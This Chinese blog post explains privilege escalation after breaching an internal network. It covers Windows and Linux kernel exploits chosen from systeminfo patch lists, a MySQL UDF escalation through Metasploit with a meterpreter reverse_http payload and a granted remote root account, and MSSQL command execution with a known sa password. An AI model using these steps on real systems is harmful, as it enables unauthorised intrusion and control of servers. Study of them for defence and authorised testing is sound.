关于内网渗透的提权问题

最新推荐文章于 2024-01-08 09:52:38 发布
最新推荐文章于 2024-01-08 09:52:38 发布
阅读量822 收藏 5
点赞数 1
文章标签: 安全 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_48421613/article/details/117465220
版权 
	最近有小老弟问我,总有面试官问关于提权的问题,总是能把我难住。好吧,面试造航母干活 拧螺丝这句话在哪里都很实用,索性今天也就写一下我认为的提权。
	首先呢,其实权限提升这种事情多用于内网渗透,这里指的内网渗透当然不是你处于内网环境的渗透测试,而是那种在攻防演练、护网、打击境外的一些特殊场景,由外网入侵到内网做后渗透的时候遇到的权限提升问题。(大佬勿喷,我实在想不到还有哪里做提权,正常安全评估是完全用不到这一项技能的,毕竟传统工艺点到为止)

什么是提权

主要针对在对网站的渗透过程中,通过利用网站或服务器系统的漏洞提升当前权限,使我们能拥有服务器的最高权限。

提权的两种方式

系统漏洞提权

MS08-025 (KB951537)
MS09-012 (KB952004)
MS10-048 (KB2160329)
Linux Kernel <= 2.6.37 Local Privilege Escalation

系统提权ms09-12 案例(Pr.exe(KB952004))
Windows跟踪注册表ACL权限提升漏洞
在这里插入图片描述MS09-012 :Churrasco(KB956572)烤肉
Windows跟踪注册表ACL权限提升漏洞
在这里插入图片描述MS08-025 (KB951537)
Windows内核级提权漏洞
在这里插入图片描述Linux Kernel <= 2.6.37 Local Privilege Escalation
在这里插入图片描述案例就这么多,此处以windows server提权为例,由于提权马众多,在真实场景中应该如何使用呢?
在这里插入图片描述WIN+R
systeminfo命令可以得到系统信息,包括打了哪些补丁
在这里插入图片描述打开在线网站,识别都有哪些提权漏洞可供使用
http://blog.neargle.com/win-powerup-exp-index/
将你得到的补丁信息复制到网站,即可获得使用提权马的详细信息
在这里插入图片描述还有的小伙纸问我,这么弄太麻烦了,有没有办法将systeminfo的信息输出到文件中,然后用自动化工具进行本地识别
这里我只说一下怎么将命令输出打印至txt目录,其实很简单

systeminfo > 目录/文件名

例子:
在这里插入图片描述在这里插入图片描述在这里插入图片描述系统提权没什么可讲的,手工大佬那另当别论,使用这种东西的缺陷也很明显,因为这种提权木马是未免杀的,对面有防火墙、杀软就呜呼哀哉了,匿了,仅供学习,大家不要作死,作死别带上我

第三方软件提权

Serv-U
VNC
SQL Server
……
第三方软件是什么意思呢,就是一些工具安装会自动创建一个管理员权限的账户,我们可以利用这种机制去进行一个权限提升

Serv-U (43958端口)
在这里插入图片描述VNC提权
在这里插入图片描述SQL Server SA
在这里插入图片描述PcAnyWhere
在这里插入图片描述不过很明显的就是,有些东西已经不太适用于当下环境了,技术更新了,所以这里以我遇到过的举例子,分别为众所周知的mysql-udf提权、mssql提权

MySql-UDF提权

原理:
使用MSF中的 exploit/multi/mysql/mysql_udf_payload 模块也可以进行UDF提权。MSF会将dll文件写入lib\plugin\目录下(前提是该目录存在,如果该目录不存在的话,则无法执行成功),dll文件名为任意创建的名字。该dll文件中包含sys_exec()和sys_eval()两个函数,但是默认只创建sys_exec()函数,该函数执行并不会有回显。我们可以手动创建 sys_eval() 函数,来执行有回显的命令。

前提条件:
1.该用户拥有远程登录的权限
2.知晓用户名以及密码

若是用户没有远程登录的权限咋办,当然是想办法登录他的数据库手工创建一个了

  1. 登录测试靶机创建远程访问用户
    输入sql语句grant all privileges on . to ‘root’@’%’ identified by ‘123456’ with grant option; 创建可远程连接用户,如图1
grant all privileges on *.* to 'root'@'%' identified by '123456' with grant option;

在这里插入图片描述2. 使用kili , msfconsloe , 输入search mysql_udf_payload 如下图2
在这里插入图片描述3. use exploit/multi/mysql/mysql_udf_payload ,使用,如下图3
在这里插入图片描述4. show payload ,查看可用payloads,如图4
在这里插入图片描述5. 设置payload , set payload windows/meterpreter/reverse_http ,如图5
在这里插入图片描述6. 设置数据库用户名,密码,ip地址以及监听端口 set rhosts ; set username ; set password ; set lport,如图6
在这里插入图片描述7. exploit
在这里插入图片描述小实验验证
使用navicat图形化工具,登录账户执行命令
select sys_exec(‘whoami’); / /执行系统命令,msf默认创建sys_exec无回显,返回0为成功
在这里插入图片描述create function sys_eval returns string soname ‘wsODEVzX.dll’; //手动创建有回显的函数,后面的.dll文件为随机生成,直接在Kili中可见
select sys_eval(‘whoami’); 执行一次,如图9
在这里插入图片描述

Mssql提权

已知sa(默认)用户,密码为rising00.00!123 ,进行mssql提权
使用msfconsole,输入以下命令

search mssql
use uxiliary/admin/mssql/mssql_exec 
set rhosts 10.10.59.247
set password rising00.00!123
set cmd whoami
Show  options
exploit

在这里插入图片描述
在这里插入图片描述给我施展提权的场景不多,一般情况下都是系统提权,数据库第三方组件提权其实条件很苛刻

vlan911
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
红队内攻防渗透:内渗透之Linux内升技术:suid&sudo
HACKONE的博客
06-02 201
SUDO限是root把本来只能超级用户执行的命令赋予普通用户执行,系统管理员集中的管理用户使用限和使用主机,配置文件:/etc/sudoers,除此配置之外的问题,SUDO还有两个CVE漏洞(CVE-2019-14287 CVE-2021-3156)。git源码泄露 => 找到数据库密码,登入 => 找到cms后台用户密码,改为已知密码 => 登入cms后台,写shell(低限)2、suid、sudo、nfs、path、ld_preload、cron、lxd、capability、rbash等。
渗透-
weixin_60329395的博客
08-26 1269
升流程:信息收集-补丁筛选-利用MSF或特定EXP-西瓜到手漏洞库推荐:Vulmap、Wes、WindowsVulnScanwindows-exp-suggester在17年后未更新,不再推荐Vulmap是PowerShell脚本,使用最简单,但web往往只能有cmd窗口,不一定有PowerShell环境,导致该项目对Windows系统不友好Wes和WindowsVulnScan是python脚本,可以不借助PowerShell操作,更适用于web。...
渗透总结一:第一步
yggcwhat
05-06 2329
渗透总结一:第一步!!!
升-Win溢出漏洞及AT&SC&PS
weixin_44805159的博客
10-13 290
#知识点必备用户及用户组限划分:Windows名Windows系统内置了许多本地用户组,这些用户组本身都已经被赋予一些限(permissions),它们具有管理本地计算机或访问本地资源的限。只要用户账户加入到这些本地组内,这些用户账户也将具备该组所拥有的限。0x01 普通限默认情况下,系统为用户分了7个组,并给每个组赋予了不同的操作限,管理员组(Administrator)、高限用户组(Power Users)、普通用户组(Users)、备份操作组(Backup Operators)、文件
安学习-Linux
weixin_44770698的博客
07-23 1294
安学习-Linux
部分渗透文章
04-16
"部分渗透文章"的主题聚焦于如何在获取初步访问限后,进一步限,进行内渗透,以及在Linux环境下的相关技巧。这里我们将深入探讨XSS(跨站脚本)攻击、社会工程学利用,以及的基本概念和实践案例。...
渗透测试-工具
05-25
渗透测试是信息安全领域中的一个重要环节,主要目的是模拟黑客攻击行为,以发现并修复组织内部络中的安全漏洞。在这个过程中,是关键的一环,它指的是在获取了低限账户后,尝试升级到管理员限,从而...
渗透exp补丁对比工具,附带有udf,过狗功能
08-07
渗透络安全领域中的一个重要话题,主要涉及如何在未经授的情况下获取络内部系统更高的限。这个工具包,名为"GetRoot-Tools-master",是针对这一目标设计的,特别是针对Windows服务器的操作系统,...
渗透测试:MySql的利用与思路总结1
08-03
渗透测试:MySql的利用与思路总结1
渗透笔记,课堂资料
最新发布
03-11
这可能通过溢出攻击、漏洞或其他技术实现。同时,横向移动是指在内中从一个系统迁移到另一个系统,以扩大控制范围。这需要对内的通信协议和认证机制有深入理解。 四、持久化与隐藏踪迹 渗透者为了保持长期...
专包 所有的工具都在里面
10-21
专包.zip 专包 所有的工具都在里面
利用windows系统漏洞
cxrpty的博客
03-10 1424
实验环境:windows2003和windows2008 实验原理:通过systeminfo对比补丁编号,寻找exp,将exp上传到服务器进行攻击 站中存在任意用户可读可写可执行的目录(Windows2003:RECYCLER 回收站,windows2008: C:\Windows\Temp\) 实验步骤...
MySQL UDF执行系统命令
yggcwhat
05-04 927
MySQL UDF执行系统命令
(墨者学院)-主机溢出漏洞分析
qq_52074678的博客
12-11 3179
需要的小知识大纲 1、掌握文件上传的技巧; 2、掌握IIS中间件存在的畸形解析漏洞; 3、了解Windows系统CMD命令执行; 4、了解查看操作系统安全补丁情况; 5、了解Windows操作系统的文件限设置; 6、了解操作系统的溢出漏洞的方式; 小知识 具体流程 1. ...
Windows内渗透的几个实用命令
weixin_30463341的博客
09-24 164
from/ http://www.freebuf.com/articles/system/114731.html 这不是一篇渗透测试指导,而是简单介绍了几个Windows内的实用命令,以供我等菜鸟学习观摩,还望大牛包涵指导。 1.获取操作系统信息 识别操作系统名称及版本: C:\Users\thel3l> systeminfo | findstr /B /C:"OS Na...
渗透系列:升方法小结
闵行小鱼塘
07-30 711
小结下升方法
渗透之——windows本地漏洞之——溢出
wsnbbz的博客
03-10 2021
利用本地服务漏洞基本思路 1.systeminfo收集补丁信息 执行命令:systeminfo 查看系统信息(包含补丁信息) 2.对比补丁编号,寻找可用exp(Exploit,漏洞攻击脚本) 寻找此版本存在的所有漏洞,对比此服务器有哪些没有打过补丁,利用没打补丁的漏洞exp攻击 3.将合适的exp上传到服务器【可利用dama(密码xiaowang520)、菜刀上传】 exp上传...
[渗透测试]—7.3 内渗透技术
wuli1024的博客
01-08 1168
渗透是指攻击者在成功进入目标络后,对内部资源进行横向渗透以获取更多限和信息的过程。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值